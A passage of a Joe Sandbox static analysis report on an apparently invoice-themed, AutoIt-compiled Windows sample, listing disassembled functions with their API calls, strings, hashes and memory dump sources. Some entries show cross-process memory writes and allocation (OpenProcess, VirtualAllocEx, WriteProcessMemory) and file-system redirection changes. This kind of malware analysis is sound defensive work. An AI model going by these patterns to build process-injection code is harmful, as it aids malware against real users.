                                          • Instruction Fuzzy Hash: 71F0AF70200704AFEB110FA5EC88E6B3BACEF4A755B10043EF945D2250DF649C09DB64
                                          Function 0045C1E3 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetDlgItem.USER32(?,000003E9), ref: 0045C1F7
                                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 0045C20E
                                          • MessageBeep.USER32(00000000), ref: 0045C226
                                          • KillTimer.USER32(?,0000040A), ref: 0045C242
                                          • EndDialog.USER32(?,00000001), ref: 0045C25C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: BeepDialogItemKillMessageTextTimerWindow
                                          • String ID:
                                          • API String ID: 3741023627-0
                                          • Opcode ID: 4cc83a5054ee70337c3131b30a14a5b24bd9acd8f200e045765572ac389ab5c6
                                          • Instruction ID: 1cbdf9da880a683b58ffeaf16326a4f2222d3a7c74a558aa9ab436c5b6b9af77
                                          • Opcode Fuzzy Hash: 4cc83a5054ee70337c3131b30a14a5b24bd9acd8f200e045765572ac389ab5c6
                                          • Instruction Fuzzy Hash: DF0167309047049BEB205B54DD8EB9A7778BB00706F000ABEB942A15E1DBF8699DDB59
                                          Function 004013B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                          Download Yara Rule
                                          APIs
                                          • EndPath.GDI32(?), ref: 004013BF
                                          • StrokeAndFillPath.GDI32(?,?,0043B888,00000000,?), ref: 004013DB
                                          • SelectObject.GDI32(?,00000000), ref: 004013EE
                                          • DeleteObject.GDI32 ref: 00401401
                                          • StrokePath.GDI32(?), ref: 0040141C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Path$ObjectStroke$DeleteFillSelect
                                          • String ID:
                                          • API String ID: 2625713937-0
                                          • Opcode ID: e3422339a15b844a04c007a3cb2e97a240e6e454912aa1f685e9751c28b57a09
                                          • Instruction ID: 52848d70ea624aaff4fbf1a8dc35ad1b05fe5f58837c3e038025b123c59b5ab6
                                          • Opcode Fuzzy Hash: e3422339a15b844a04c007a3cb2e97a240e6e454912aa1f685e9751c28b57a09
                                          • Instruction Fuzzy Hash: E9F01930000A08EFDB516F26EC4CB5D3BA4A741326F188639E829981F1CB3459A9DF28
                                          Function 00412CFB Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
                                            • Part of subcall function 00420DB6: __CxxThrowException@8.LIBCMT ref: 00420E01
                                            • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                            • Part of subcall function 00407A51: _memmove.LIBCMT ref: 00407AAB
                                          • __swprintf.LIBCMT ref: 00412ECD
                                          Strings
                                          • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00412D66
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                          • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                          • API String ID: 1943609520-557222456
                                          • Opcode ID: e1bf6533362d961aa045ef11270170a0bc49c4ef3bb8348677819d21e8331e08
                                          • Instruction ID: 5fa1cbf72f49bdff47ddac1708762697048697bfe45d30711dc422f43ccdaf03
                                          • Opcode Fuzzy Hash: e1bf6533362d961aa045ef11270170a0bc49c4ef3bb8348677819d21e8331e08
                                          • Instruction Fuzzy Hash: AF91AD716083119FD714EF25D985CAFB7A8EF85314F00482FF441AB2A2DA78ED85CB5A
                                          Function 0045B2F3 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 241comCOMMON
                                          Download Yara Rule
                                          APIs
                                          • OleSetContainedObject.OLE32(?,00000001), ref: 0045B4BE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: ContainedObject
                                          • String ID: AutoIt3GUI$Container$%I
                                          • API String ID: 3565006973-4251005282
                                          • Opcode ID: b0ef9ef2592e363b8beabdfb88cbb6824cc0f8258bc98d745d804ae61dd96c16
                                          • Instruction ID: 7009c248d49ee490af6c5c3a89f60ad5612698b65dddc7868321d046ba5149c9
                                          • Opcode Fuzzy Hash: b0ef9ef2592e363b8beabdfb88cbb6824cc0f8258bc98d745d804ae61dd96c16
                                          • Instruction Fuzzy Hash: E6915B70200605AFDB14DF64C884B6ABBE5FF49705F20856EED46CB392EB74E845CBA4
                                          Function 0042501D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                          Download Yara Rule
                                          APIs
                                          • __startOneArgErrorHandling.LIBCMT ref: 004250AD
                                            • Part of subcall function 004300F0: __87except.LIBCMT ref: 0043012B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: ErrorHandling__87except__start
                                          • String ID: pow
                                          • API String ID: 2905807303-2276729525
                                          • Opcode ID: 4113f970b40e4ddfad9eaf005de12111c539308e3198b2e3fd8f87d65f62cc15
                                          • Instruction ID: 06df28618b400316a62ebb5dd7aba5b0962afb7cd5aceff72fbc56c90cb9ae17
                                          • Opcode Fuzzy Hash: 4113f970b40e4ddfad9eaf005de12111c539308e3198b2e3fd8f87d65f62cc15
                                          • Instruction Fuzzy Hash: 20518B20B0C50186DB217B24ED2137F2B909B44700F608AABE4D5863AADE3D8DD4DB8E
                                          Function 00448584 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 148COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: _memmove
                                          • String ID: 3cA$_A
                                          • API String ID: 4104443479-3480954128
                                          • Opcode ID: 470fd055cd62c062cad60ef6c87f64deccec5063348adfb3c377f09d63a70252
                                          • Instruction ID: c37b5588275ae9a3f9bfbb083816e01235b481b2fd059d6d91eac45173b7304a
                                          • Opcode Fuzzy Hash: 470fd055cd62c062cad60ef6c87f64deccec5063348adfb3c377f09d63a70252
                                          • Instruction Fuzzy Hash: 24516B70E006199FDB64CF68C880AAEBBB1FF44304F14852EE85AD7350EB39A995CB55
                                          Function 004597F5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 004614BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00459296,?,?,00000034,00000800,?,00000034), ref: 004614E6
                                          • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0045983F
                                            • Part of subcall function 00461487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,004592C5,?,?,00000800,?,00001073,00000000,?,?), ref: 004614B1
                                            • Part of subcall function 004613DE: GetWindowThreadProcessId.USER32(?,?), ref: 00461409
                                            • Part of subcall function 004613DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0045925A,00000034,?,?,00001004,00000000,00000000), ref: 00461419
                                            • Part of subcall function 004613DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0045925A,00000034,?,?,00001004,00000000,00000000), ref: 0046142F
                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 004598AC
                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 004598F9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                          • String ID: @
                                          • API String ID: 4150878124-2766056989
                                          • Opcode ID: 25131a85ebe6ddc6b48413ca47e37c1e8c65e46d0e1ba382f06cbd4a7eab333c
                                          • Instruction ID: 83720f96416bb9890d74edf788c2ecf3a7fc11859df44560b8e2e1ee8df86db8
                                          • Opcode Fuzzy Hash: 25131a85ebe6ddc6b48413ca47e37c1e8c65e46d0e1ba382f06cbd4a7eab333c
                                          • Instruction Fuzzy Hash: 8E41627690021CBFDB10DFA5CC41EDEBBB8EB05300F14415AF945B7251DA746E89CBA5
                                          Function 004873D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00487461
                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00487475
                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00487499
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: MessageSend$Window
                                          • String ID: SysMonthCal32
                                          • API String ID: 2326795674-1439706946
                                          • Opcode ID: 61045321ac7bf12d5b8baadd1c1317b301de72fcd6e86f1e347c12b9b39caacc
                                          • Instruction ID: a782af31bde95408328e4f00c38aa01da76ea549d3e2a3982252f7da8ca2871c
                                          • Opcode Fuzzy Hash: 61045321ac7bf12d5b8baadd1c1317b301de72fcd6e86f1e347c12b9b39caacc
                                          • Instruction Fuzzy Hash: CD21D032100218BBDF11DFA4CC42FEE3B69EB48724F210615FE156B190DA79EC918BA4
                                          Function 00486CB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00486D3B
                                          • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00486D4B
                                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00486D70
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: MessageSend$MoveWindow
                                          • String ID: Listbox
                                          • API String ID: 3315199576-2633736733
                                          • Opcode ID: 751df69c11bbdcf7b5361d053624c448979b1fb0f20ab75c9448d7b30a168b5b
                                          • Instruction ID: 4c3adc306d008ae433eb9b24af907097c824bc429f4b76309dac7fd9fc57b361
                                          • Opcode Fuzzy Hash: 751df69c11bbdcf7b5361d053624c448979b1fb0f20ab75c9448d7b30a168b5b
                                          • Instruction Fuzzy Hash: 0B21F232600118BFEF129F54CC45FAF3BBAEF89750F028529F940AB2A0C675AC5197A4
                                          Function 0048770E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00487772
                                          • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00487787
                                          • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00487794
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID: msctls_trackbar32
                                          • API String ID: 3850602802-1010561917
                                          • Opcode ID: 1c29657f45557683d1b312c07fddb74740427be331155a373290d3506167769a
                                          • Instruction ID: f92afa797eeb34fec66cc861e9e49cfc52a42a3b8dc3c72e421b2ad803853977
                                          • Opcode Fuzzy Hash: 1c29657f45557683d1b312c07fddb74740427be331155a373290d3506167769a
                                          • Instruction Fuzzy Hash: 78112732204208BEEF106F61CC01FDF7768EF88B54F21052EFA41A21A0C275F851CB24
                                          Function 00426B71 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: __calloc_crt
                                          • String ID: K$@BL
                                          • API String ID: 3494438863-2209178351
                                          • Opcode ID: 1dcb651b5103459d55ad6e63b5153fbe911c496dbbbddd92234eb52377e23d61
                                          • Instruction ID: ecd99e2cd8c25bd978de89897c730db32a1f4afae71c84053b65a056749c41d4
                                          • Opcode Fuzzy Hash: 1dcb651b5103459d55ad6e63b5153fbe911c496dbbbddd92234eb52377e23d61
                                          • Instruction Fuzzy Hash: 13F0A4713056318BE7A48F15BC51E9A6BD4EB40334F91006BE504CE280EB38B8818A9C
                                          Function 00404C03 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00404BD0,?,00404DEF,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404C11
                                          • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00404C23
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                          • API String ID: 2574300362-3689287502
                                          • Opcode ID: 405154c16e2ccef9ecdbf58c32324ea843781b108d72a9dad8986559099558a3
                                          • Instruction ID: 336b7b4d781913fc81d88f89c4603830af099844575e0fd289a57b9d24372fc6
                                          • Opcode Fuzzy Hash: 405154c16e2ccef9ecdbf58c32324ea843781b108d72a9dad8986559099558a3
                                          • Instruction Fuzzy Hash: 21D08C70500712CFD7206F70D90830BB6D5AF08352B118C3E9481D2690E6B8D8808728
                                          Function 00404C36 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00404B83,?), ref: 00404C44
                                          • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00404C56
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                          • API String ID: 2574300362-1355242751
                                          • Opcode ID: ede2280b6c29169b17772aa7acd9e81a2ae4f3a09695aed7be4b1fdaf97be5ce
                                          • Instruction ID: 94e8dd0119df68c591ce1b6916bf7291aa534648892bae55459e1f5a441e7c38
                                          • Opcode Fuzzy Hash: ede2280b6c29169b17772aa7acd9e81a2ae4f3a09695aed7be4b1fdaf97be5ce
                                          • Instruction Fuzzy Hash: 05D0C270500713CFD7206F31C80830A72D4AF00351B218C3F9591D62A8E678D8C0C728
                                          Function 00480DE7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryA.KERNEL32(advapi32.dll,?,00481039), ref: 00480DF5
                                          • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00480E07
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: RegDeleteKeyExW$advapi32.dll
                                          • API String ID: 2574300362-4033151799
                                          • Opcode ID: fae212b9462cf56759409cc1f58fb8eb23c0b65c0082e346e03b2c3ad688c6db
                                          • Instruction ID: d6bbf1028a7b4fc64c7871010167997e003500dc78b62918f38a53d73d50c6ba
                                          • Opcode Fuzzy Hash: fae212b9462cf56759409cc1f58fb8eb23c0b65c0082e346e03b2c3ad688c6db
                                          • Instruction Fuzzy Hash: ACD08231560322DFC320AF70C80838B72E4AF04342F208C3E9582C2250E6B8D8948B28
                                          Function 004790E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00478CF4,?,0048F910), ref: 004790EE
                                          • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00479100
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
